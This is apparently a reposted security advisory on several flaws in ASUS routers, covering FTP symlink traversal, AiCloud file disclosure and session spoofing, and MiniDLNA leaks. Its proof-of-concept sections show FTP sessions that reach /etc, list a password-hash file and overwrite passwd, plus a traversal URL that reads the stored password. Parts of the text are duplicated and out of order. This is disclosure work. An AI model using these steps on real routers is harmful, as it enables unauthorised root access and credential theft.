Affected Vendor: ASUS - http://www.asus.com/au/Networking/Wireless-Routers-Products/
Affected Device: Multiple - including: RT-AC3200
Affected Version: Multiple - including: 3.0.0.4.378_7838
Issue type: Multiple Vulnerabilities
Release Date: 14 Apr 2016
Discovered by: T.J. Acton
Issue status: Vendor patch available at
http://www.asuswrt.net/2016/03/30/asus-release-beta-firmware-for-acn-router
Summary
ASUS produces a suite of mid to high-end consumer-grade routers. The RT-AC3200 is confirmed to be affected, and the following devices are assumed to be affected:
Impact
2. FTP users can access certain system files when Download Master is installed
Impact
3. FTP users can read all system files, and retrieve an unsalted root password hash, when Download Master is installed
Legend:
Condition A: When Download Master is installed
Condition B: When read access for the ASUSWARE.ARM USB directory had already been granted to any other FTP user at the time the anonymous user account was enabled
Condition C: When read access for the ASUSWARE.ARM USB directory has been granted to the current FTP user
Impact
Proof of concept
FTP users can overwrite arbitrary system files
Legend:
Condition A: When Download Master is installed
Condition B: When write access for the ASUSWARE.ARM USB directory had already been granted to any other FTP user at the time the anonymous user account was enabled
Condition C: When write access for the ASUSWARE.ARM USB directory has been granted to the current FTP user
Impact
Proof of concept
Sensitive file disclosure in AiCloud’s AiDisk server
This vulnerability can lead to SSH/admin interface access as a result of unsalted MD5 hashed password disclosure. Note: unauthenticated users can exploit this issue whilst impersonating an administrative user via TJA-ASUS-06)
Impact
Proof of concept
Session management flaw in AiCloud
Impact
Sensitive information disclosure in MiniDLNA server
Impact
Proof of concept
Solution
http://www.asuswrt.net/2016/03/30/asus-release-beta-firmware-for-acn-router/
Response timeline
22/03/2016 - Patch available.
26/03/2016 - Advisory released.
http://www.asuswrt.net/2016/03/30/asus-release-beta-firmware-for-acn-router
Summary
ASUS produces a suite of mid to high-end consumer-grade routers. The RT-AC3200 is confirmed to be affected, and the following devices are assumed to be affected:
TM-AC1900
RT-AC3200
RT-AC87U
RT-AC68U
RT-AC68P
RT-AC68R
RT-AC68W
RT-AC66R
RT-AC66W
RT-AC66U
RT-AC56U
RT-AC51U
RT-N18UDescription
The affected ASUS routers suffer from insecure default configuration for Anonymous users, once anonymous access in enabled. Write access is enabled for all directories in the attached storage by default. Furthermore, the administrator is not able to restrict read or write access for any specific directories on attached storage devices.
Impact
The anonymous FTP user can write arbitrary files to the attached storage device.
2. FTP users can access certain system files when Download Master is installed
Description
The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to gain limited access to certain system files and directories when Download Master is installed.
Impact
The attacker can read certain system files via FTP.
3. FTP users can read all system files, and retrieve an unsalted root password hash, when Download Master is installed
Description
The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to access all system files and directories, including /etc. This vulnerability leads to SSH / admin interface access due to the exposure of the Lighttpd password stored as an unsalted MD5 hash - this password is automatically created by copying the root user’s existing credentials for SSH / Administrative Interface access.
Legend:
Condition A: When Download Master is installed
Condition B: When read access for the ASUSWARE.ARM USB directory had already been granted to any other FTP user at the time the anonymous user account was enabled
Condition C: When read access for the ASUSWARE.ARM USB directory has been granted to the current FTP user
| User | Conditions | |||
|---|---|---|---|---|
| Anonymous | FTP User Accounts | Condition A | Condition B | Condition C |
| x | x | x | ||
| x | x | x |
Impact
The attacker gains access to all system files, including /etc/passwd. Exposure of unsalted MD5 lighthttpd password hash, which is automatically created by copying the root user’s credentials for SSH / Administrative Interface access
Proof of concept
A complete PoC exploit script will be released after public disclosure. The script leverages an anonymous user account, or a valid FTP user account, retrieves and cracks the root password hash, and attempts to spawn an SSH shell in the context of the root user.
$ ftp 192.168.1.1
Connected to 192.168.1.1.
220 Welcome to ASUS RT-AC3200 FTP service.
Name (192.168.1.1:acton): anonymous
331 Please specify the password.
Password:
230 Login successful.
ftp> cd /../opt
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||19683|)
150 Here comes the directory listing.
lrwxrwxrwx 1 0 0 39 Jan 06 12:58 asusware.arm -> /tmp/mnt/sda1/asusware.arm/asusware.arm
drwxr-xr-x 2 0 0 860 Jan 06 12:58 bin
lrwxrwxrwx 1 0 0 30 Jan 06 12:58 etc -> /tmp/mnt/sda1/asusware.arm/etc
lrwxrwxrwx 1 0 0 34 Jan 06 12:58 include -> /tmp/mnt/sda1/asusware.arm/include
lrwxrwxrwx 1 0 0 31 Jan 06 12:58 info -> /tmp/mnt/sda1/asusware.arm/info
drwxr-xr-x 2 0 0 2860 Jan 06 12:58 lib
lrwxrwxrwx 1 0 0 30 Jan 06 12:58 man -> /tmp/mnt/sda1/asusware.arm/man
lrwxrwxrwx 1 0 0 31 Jan 06 12:58 sbin -> /tmp/mnt/sda1/asusware.arm/sbin
lrwxrwxrwx 1 0 0 32 Jan 06 12:58 share -> /tmp/mnt/sda1/asusware.arm/share
lrwxrwxrwx 1 0 0 30 Jan 06 12:58 tmp -> /tmp/mnt/sda1/asusware.arm/tmp
lrwxrwxrwx 1 0 0 30 Jan 06 12:58 usr -> /tmp/mnt/sda1/asusware.arm/usr
226 Directory send OK.
ftp> cd etc
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||39223|)
150 Here comes the directory listing.
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 asus_conf.d
-rwxrwxrwx 1 0 0 11269 Jul 22 2013 asus_lighttpd.conf
-rwxrwxrwx 1 0 0 39 Feb 18 2014 asus_lighttpdpassword
-rwxrwxrwx 1 0 0 3264 Oct 25 2012 asus_modules.conf
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 asus_script
drwxrwxrwx 1 0 0 4096 Jan 06 12:58 dm2_amule
-rwxrwxrwx 1 0 0 40 Jan 06 12:58 dm2_ed2k.conf
-rwxrwxrwx 1 0 0 694 Jan 06 12:58 dm2_general.conf
-rwxrwxrwx 1 0 0 694 Jan 06 12:58 dm2_general_bak.conf
-rwxrwxrwx 1 0 0 36108 Jan 06 12:58 dm2_nzbget.conf
-rwxrwxrwx 1 0 0 97 Jan 06 12:58 dm2_snarf.conf
-rwxrwxrwx 1 0 0 156 Jan 06 12:58 dm2_transmission.conf
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 downloadmaster
-rwxrwxrwx 1 0 0 0 Jan 05 12:15 hello.html
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 init.d
-rwxrwxrwx 1 0 0 263 Jan 06 12:58 ipkg.conf
-rwxrwxrwx 1 0 0 214 Jan 06 14:09 passwd
-rwxrwxrwx 1 0 0 23 Jan 05 12:20 test.sh
226 Directory send OK.
FTP users can overwrite arbitrary system files
Description
The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to overwrite arbitrary files, including system files. This vulnerability leads to SSH / admin interface access due to the exposure of the Lighttpd password stored as an unsalted MD5 hash - this password is automatically created by copying the root user’s existing credentials for SSH / Administrative Interface access.
Legend:
Condition A: When Download Master is installed
Condition B: When write access for the ASUSWARE.ARM USB directory had already been granted to any other FTP user at the time the anonymous user account was enabled
Condition C: When write access for the ASUSWARE.ARM USB directory has been granted to the current FTP user
| User | Conditions | |||
|---|---|---|---|---|
| Anonymous | FTP User Accounts | Condition A | Condition B | Condition C |
| x | x | x | ||
| x | x | x |
Impact
The attacker gains write privileges to all system files, including /etc/passwd and /etc/shadow.
Proof of concept
ftp> cd etc
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||39223|)
150 Here comes the directory listing.
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 asus_conf.d
-rwxrwxrwx 1 0 0 11269 Jul 22 2013 asus_lighttpd.conf
-rwxrwxrwx 1 0 0 39 Feb 18 2014 asus_lighttpdpassword
-rwxrwxrwx 1 0 0 3264 Oct 25 2012 asus_modules.conf
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 asus_script
drwxrwxrwx 1 0 0 4096 Jan 06 12:58 dm2_amule
-rwxrwxrwx 1 0 0 40 Jan 06 12:58 dm2_ed2k.conf
-rwxrwxrwx 1 0 0 694 Jan 06 12:58 dm2_general.conf
-rwxrwxrwx 1 0 0 694 Jan 06 12:58 dm2_general_bak.conf
-rwxrwxrwx 1 0 0 36108 Jan 06 12:58 dm2_nzbget.conf
-rwxrwxrwx 1 0 0 97 Jan 06 12:58 dm2_snarf.conf
-rwxrwxrwx 1 0 0 156 Jan 06 12:58 dm2_transmission.conf
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 downloadmaster
-rwxrwxrwx 1 0 0 0 Jan 05 12:15 hello.html
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 init.d
-rwxrwxrwx 1 0 0 263 Jan 06 12:58 ipkg.conf
-rwxrwxrwx 1 0 0 214 Jan 06 14:09 passwd
-rwxrwxrwx 1 0 0 23 Jan 05 12:20 test.sh
226 Directory send OK.
ftp> put passwd
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||41235|)
150 Ok to send data.
100% |*************************************************************************************************************************************| 214 283.94 KiB/s 00:00 ETA
226 File receive OK.
214 bytes sent in 00:00 (60.83 KiB/s)
Sensitive file disclosure in AiCloud’s AiDisk server
Description
AiCloud suffers from sensitive file exposure. Authenticated users are able to access sensitive files, including password and configuration files, via a directory traversal bug in AiCloud’s AiDisk server.
This vulnerability can lead to SSH/admin interface access as a result of unsalted MD5 hashed password disclosure. Note: unauthenticated users can exploit this issue whilst impersonating an administrative user via TJA-ASUS-06)
Impact
Attackers can access sensitive files.
Proof of concept
https://192.168.1.1/RT-AC3200/sda1%2fasusware.arm/etc%2fasus_lighttpdpassword
Session management flaw in AiCloud
Description
AiCloud suffers from a session management flaw. If the attacker has the same external network (or is on the same local network), they can spoof their User-Agent to match the admin’s User-Agent, and by doing so impersonate the Admin user. This is only possible while the Admin has an active session. Note: This vulnerability can lead to SSH/admin interface access as a result of unsalted MD5 hashed password disclosure, as per issue TJA-ASUS-05
Impact
Attackers can access sensitive files.
Sensitive information disclosure in MiniDLNA server
Description
The MiniDLNA server on port 8200 suffers from a remote, unauthenticated sensitive information disclosure. Exposed information includes: details of all clients (including: internal IP address, MAC address, and device type), and file type statistics for attached storage devices.
Impact
Attackers can access sensitive information remotely, without authentication.
Proof of concept
http://[IP/HOST]:8200
MiniDLNA status
Media library
Audio files 347
Video files 0
Image files 6
Connected clients
ID Type IP Address HW Address Connections
0 Samsung Series [CDEF] 192.168.1.99 48:5A:3F:6D:02:A4 0
1 Unknown 192.168.1.55 78:31:C1:CD:11:63 0
0 connections currently open
Solution
Apply the patch available for download from vendor at the following address:
http://www.asuswrt.net/2016/03/30/asus-release-beta-firmware-for-acn-router/
Response timeline
07/01/2016 - Vendor contacted
22/03/2016 - Patch available.
26/03/2016 - Advisory released.
No comments:
Post a Comment